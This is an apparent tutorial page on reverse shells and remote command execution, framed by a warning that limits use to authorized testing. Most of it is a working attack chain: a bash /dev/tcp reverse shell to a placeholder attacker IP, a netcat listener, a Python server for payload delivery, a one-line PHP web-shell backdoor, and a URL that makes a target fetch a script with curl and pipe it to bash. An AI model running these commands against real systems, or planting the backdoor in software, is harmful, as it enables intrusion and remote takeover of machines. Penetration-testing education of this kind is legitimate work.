Reverse Shells and Remote Command Execution
WARNING: These techniques are for authorized ethical hacking, penetration testing, and educational purposes ONLY. Unauthorized access to computer systems is illegal and unethical. Use these commands ONLY on systems you have explicit permission to test.
Introduction
A reverse shell is a type of shell that connects from a target machine back to an attacker’s machine. This is often used in exploitation scenarios where direct inbound connections to the target are blocked by firewalls, but outbound connections are allowed. The target initiates the connection, allowing the attacker to gain command-line access.
Remote Command Execution (RCE) refers to a vulnerability that allows an attacker to execute arbitrary commands on a target system. This is a critical vulnerability that can often lead to a full system compromise.
1. Bash Reverse Shell Payload
This bash command creates a reverse shell that connects back to a specified IP address and port on the attacker’s machine.
#!/bin/bash
bash -i >& /dev/tcp/<YOUR_ATTACKER_IP>/<LISTENER_PORT> 0>&1bash -i: Opens an interactive bash shell.>& /dev/tcp/<YOUR_ATTACKER_IP>/<LISTENER_PORT>: Redirects bothstdoutandstderrto a TCP connection established to the attacker’s IP and listener port.0>&1: Redirectsstdinto the same TCP connection, making the shell interactive.
2. Attacker’s Netcat Listener
On your attacker machine, you need a listener to catch the incoming reverse shell connection. netcat (nc) is a versatile networking utility often used for this purpose.
nc -nvlp <LISTENER_PORT>-n: Numeric-only IP addresses (no DNS lookups).-v: Verbose output.-l: Listen mode (waits for an incoming connection).-p <LISTENER_PORT>: Specifies the port to listen on (e.g.,1337).
3. Serving Payloads with a Python Web Server
To deliver your reverse shell script or other payloads to the target, you can quickly spin up a simple HTTP server using Python. This server will serve files from the directory it’s run in.
python3 -m http.server 8000This command starts an HTTP server on port 8000. Any files in the current directory will be accessible via http://<YOUR_ATTACKER_IP>:8000/.
4. PHP Remote Command Execution Vulnerability
A common RCE vulnerability in web applications is the ability to execute arbitrary commands through user input. A simple PHP backdoor for this might look like this:
<?php system($_GET["cmd"]); ?>If this code is in a file named shell.php on a web server, an attacker can execute commands by passing them in the cmd GET parameter.
Complete Scenario Example: Delivering a Reverse Shell via RCE
Here’s a simplified example of how these components might be used together in an exploitation chain:
-
Attacker Setup:
- Save the bash reverse shell payload to a file, e.g.,
shell.sh. - Start a Python web server in the directory containing
shell.sh:python3 -m http.server 8000 - Start a Netcat listener on your attacker machine (e.g., port
1337):nc -nvlp 1337
- Save the bash reverse shell payload to a file, e.g.,
-
Target Exploitation (assuming RCE):
- Assume the target web server has a PHP page (
shell.php) vulnerable to RCE. - The attacker sends a request to the vulnerable page, instructing the target to download and execute the reverse shell script hosted on the attacker’s web server.
http://<TARGET_WEB_SERVER>/shell.php?cmd=curl%20<YOUR_ATTACKER_IP>:8000/shell.sh|bash- Explanation of
cmdparameter:curl <YOUR_ATTACKER_IP>:8000/shell.sh: Downloads theshell.shscript from the attacker’s web server.|bash: Pipes the content ofshell.shdirectly tobashfor execution.
- Assume the target web server has a PHP page (
-
Result:
- The target machine downloads and executes
shell.sh. shell.shinitiates a connection back to the attacker’snclistener.- The attacker gains an interactive shell on the target machine.
- The target machine downloads and executes